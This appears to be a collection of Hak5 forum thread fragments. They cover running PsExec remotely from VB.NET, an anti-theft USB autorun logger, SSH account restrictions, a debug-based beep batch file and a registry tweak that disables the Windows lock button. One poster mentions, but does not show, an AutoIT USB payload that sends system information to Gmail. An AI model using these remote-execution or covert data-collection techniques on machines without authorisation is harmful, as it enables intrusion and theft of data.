Thanks X3N i have found psexce to be a very useful tool for executing and managing remote files. Is it possible to pass this command through VB.NET 2008 with a button control?
Command to be passed with VB.NET 2008:
psexec \\Work1 program "C:\Myprogram.exe"
Any Help is greatly appreciated,
Micah C
it might be possible but kind of redundant... what is the enviroment you are trying to use this in? you could just write a wrapper in vb for psexec i prefer autoIT to vb and theres a few wrappers on the forums for autoit...
Why do you want to use VB?
-
Hey all,
I've decided to implement all your suggestions thus far.
ddns updater
ping
?mail? -- I need to play with that one a while.
?ftp? if mailing doesn't workout
also I've been looking at windows built-in utillities (hence ftp instead of blat).
perhaps getmac, ipconfig will be in there next as well to give some more device specific evidence to the authoities in case of theft.
Again this isn't aimed at uber-hackers so I'm working under the assumtion that at least on of the methods will work properly. So if the shmuk at school steals your drive you can turn over the logs to the police and the campus IT department can give them what they need.
i have some autoIT code that will email to gmail using ssl without having ot use blat or stunnel...
i actually have a full payload that dumps all the info over ssl to gmail via autoIT its posted in the usbhacks section.
-
another way to do this us to use a service like dyndns... which is basically a little program that logs into the dyndns server to bind a name to a dynamic ip address... this could easily be scripted to autorun on a usb drive... the only problem is that if someone has autorun turned off then it totally defeats the purpose because you cant force autorun to run if its disabled.
-
sorry lol so I'll just create multiple accounts with shell "/bin/false" and no rw access? Because I'm thinking about having them pay weekly to use it and if they don't I'll just disable/remove their account
and is there a way to add which accounts can't be logged into through ssh like the /etc/ftpusers file for ftp logins so i don't have to remove their account to disable access if they don't pay?
man if your friends are stupid enough to pay 2 bucks a week for access then thats great for you but sucks for them...for that money you could get some ssh or vpn access elsewhwere...thats actually secure...
your best bet is the keypairing though if your going to use ssh to do this...
-
Dear Hak5 Community,
I am looking for a way to execute and stop programs on a computer over my LAN. something really simple. I was hoping that I could execute it through a VB.NET 2008 program. I need to execute this batch file:
::== beep.bat @echo off > d.d echo e 100 07 >> d.d echo n 07.bin >> d.d echo rcx >> d.d echo 1 >> d.d echo w >> d.d echo q debug < d.d > nul copy 07.bin con > nul del d.d del 07.bin ::== DONE
Any help is greatly appreciated.
if you are on a windows domain you can pass the script through the group policy that computer belongs to... if you are not on a domain then your best bet is to copy the script to the computer and telnet or ssh into it and run the script.
another option is using one of the sysinternals tools like psexec to remotly run a command over the network. Sometimes what I will do is use psexec to spawn a remote command shell which is a little more secure then enabling telnet....
-
Hmm... didn't know that!
I'll have to try and find a third-party tool that can do that on a domain
really this is a non-issue.
There are two ways around this. First if you are running windows server then you should be using active directory to push any changes out to machines and depending on your server setup it may take a few hours for the changes to sync accross the domain.
The second way of getting around this is to make sure the person doesnt lock thier computer.
I found this on some site.... not the prefered way to do it but an option. It would be better to do it using the GPO editor.
If random users chose to lock the system (by pressing Ctrl+Alt+Delete and clicking the Lock Computer button), an administrator would need to manually unlock the system. To avoid this, the Lock Computer button can be disabled.
To disable the Lock Computer button, open Regedit and browse to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
System and create a new REG_DWORD value in each called DisableLockWorkstation. Setting this value to 0 will allow the Lock Computer button to be used, while 1 will disable it.
and as a final thought... what are you doing to these computer that you need to unlock it anyways? Most tasks can be like i mentioned before updated via a logon script or the GPO editor. Those are skills you shoulld work on. If you dont have access to that on your domain then you probably shouldnt be doing any kind of computer unlocking anyways... Also I like to run ultra vnc over the domain which can be setup to use mslogon if you want... but either way its alot handier then RDP for managing remote desktops without the user having to be logged out and you dont have to get out of your seat.
U3 and Non-U3 AutoIT payload
in USB Hacks
Posted
yeah thast what i made it do